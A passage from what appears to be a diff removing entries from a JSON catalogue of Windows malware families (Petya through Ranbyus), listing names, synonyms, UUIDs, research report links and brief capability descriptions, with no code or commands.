"https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/" - ] - }, - "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", - "value": "Petya", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ReRol" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", - "https://community.fireeye.com/external/1093" - ] - }, - "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", - "value": "pgift", - "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", - "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", - "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", - "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", - "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", - "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/" - ] - }, - "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", - "value": "Philadephia Ransom", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Trik" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", - "https://www.johannesbader.ch/2016/02/phorpiex/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" - ] - }, - "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", - "value": "Phorpiex", - "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", - "https://www.snort.org/rule_docs/1-26941" - ] - }, - "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", - "value": "pipcreat", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", - "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" - ] - }, - "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", - "value": "pirpi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", - "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", - "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" - ] - }, - "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", - "value": "Pitou", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", - "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/", - "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf" - ] - }, - "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", - "value": "PittyTiger RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Pykbot", - "TBag", - "Bublik" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", - "http://blog.kleissner.org/?p=788", - "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", - "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" - ] - }, - "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", - "value": "Pkybot", - "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" - ] - }, - "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", - "value": "PLAINTEE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", - "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" - ] - }, - "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", - "value": "playwork", - "description": "" - }, - { - "meta": { - "synonyms": [ - "TSCookie" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", - "http://www.freebuf.com/column/159865.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", - "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", - "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", - "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", - "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" - ] - }, - "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", - "value": "PLEAD", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7" - ] - }, - "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", - "value": "Plexor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", - "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", - "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" - ] - }, - "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", - "value": "Ploutus ATM", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", - "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", - "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" - ] - }, - "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", - "value": "ployx", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Korplug" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", - "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", - "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", - "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", - "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", - "https://securelist.com/time-of-death-connected-medicine/84315/", - "https://community.rsa.com/thread/185439" - ] - }, - "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", - "value": "PlugX", - "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", - "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" - ] - }, - "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", - "value": "pngdowner", - "description": "" - }, - { - "meta": { - "synonyms": [ - "pivy", - "poisonivy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", - "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", - "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", - "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", - "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", - "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", - "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", - "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] - }, - "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", - "value": "Poison Ivy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", - "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" - ] - }, - "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", - "value": "Polyglot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Siplog", - "Fareit" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", - "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", - "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", - "https://github.com/nyx0/Pony" - ] - }, - "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", - "value": "Pony", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", - "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", - "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] - }, - "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", - "value": "PoohMilk Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", - "https://twitter.com/malwrhunterteam/status/806595092177965058" - ] - }, - "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", - "value": "Popcorn Time", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" - ] - }, - "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", - "value": "portless", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", - "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" - ] - }, - "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", - "value": "poscardstealer", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", - "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" - ] - }, - "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", - "value": "Poweliks Dropper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", - "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - ] - }, - "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", - "value": "PowerDuke", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", - "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" - ] - }, - "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", - "value": "PowerPool", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", - "https://lokalhost.pl/gozi_tree.txt" - ] - }, - "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", - "value": "Powersniff", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", - "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", - "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" - ] - }, - "uuid": "606f778a-8b99-4880-8da8-b923651d627b", - "value": "PowerRatankba", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", - "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" - ] - }, - "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", - "value": "prb_backdoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", - "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" - ] - }, - "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", - "value": "Prikorma", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", - "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/", - "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502" - ] - }, - "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", - "value": "Prilex", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", - "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", - "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/", - "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/" - ] - }, - "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", - "value": "PrincessLocker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", - "https://twitter.com/mesa_matt/status/1035211747957923840" - ] - }, - "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", - "value": "PsiX", - "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule" - }, - { - "meta": { - "synonyms": [ - "PSS" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", - "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" - ] - }, - "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", - "value": "PC Surveillance System", - "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", - "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" - ] - }, - "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", - "value": "Pteranodon", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", - "http://blog.alyac.co.kr/1853", - "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" - ] - }, - "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", - "value": "PubNubRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", - "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" - ] - }, - "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", - "value": "Punkey POS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", - "https://github.com/n1nj4sec/pupy", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" - ] - }, - "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", - "value": "pupy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", - "https://www.secureworks.com/research/pushdo", - "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", - "http://malware-traffic-analysis.net/2017/04/03/index2.html", - "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" - ] - }, - "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", - "value": "Pushdo", - "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" - ] - }, - "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", - "value": "Putabmow", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", - "value": "PvzOut", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", - "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", - "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html", - "https://twitter.com/physicaldrive0/status/573109512145649664" - ] - }, - "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", - "value": "pwnpos", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", - "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", - "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", - "https://www.youtube.com/watch?v=HfSQlC76_s4" - ] - }, - "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", - "value": "Pykspa", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Locky Locker" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", - "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", - "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" - ] - }, - "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", - "value": "PyLocky", - "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" - ] - }, - "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", - "value": "Qaccel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", - "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", - "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", - "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", - "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", - "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/", - "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf" - ] - }, - "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", - "value": "Qadars", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Qbot", - "Pinkslipbot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", - "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", - "http://contagiodump.blogspot.com/2010/11/template.html", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" - ] - }, - "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", - "value": "QakBot", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Tolouge" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" - ] - }, - "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", - "value": "QHost", - "description": "" - }, - { - "meta": { - "synonyms": [ - "qtproject" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", - "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" - ] - }, - "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", - "value": "QtBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", - "https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", - "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/", - "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", - "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground" - ] - }, - "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", - "value": "Quant Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", - "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://github.com/quasar/QuasarRAT/tree/master/Client", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", - "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", - "https://twitter.com/malwrhunterteam/status/789153556255342596", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", - "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] - }, - "uuid": "05252643-093b-4070-b62f-d5836683a9fa", - "value": "Quasar RAT", - "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", - "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" - ] - }, - "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", - "value": "r980", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", - "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" - ] - }, - "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", - "value": "Radamant", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", - "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" - ] - }, - "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", - "value": "RadRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "brebsd" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", - "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" - ] - }, - "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", - "value": "Rambo", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" - ] - }, - "uuid": "51f53823-d289-4176-af45-3fca7eda824b", - "value": "Ramdo", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Nimnul" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", - "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", - "https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", - "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", - "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf", - "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", - "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", - "https://research.checkpoint.com/ramnits-network-proxy-servers/" - ] - }, - "uuid": "542161c0-47a4-4297-baca-5ed98386d228", - "value": "Ramnit", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", - "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/", - "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", - "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", - "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/" - ] - }, - 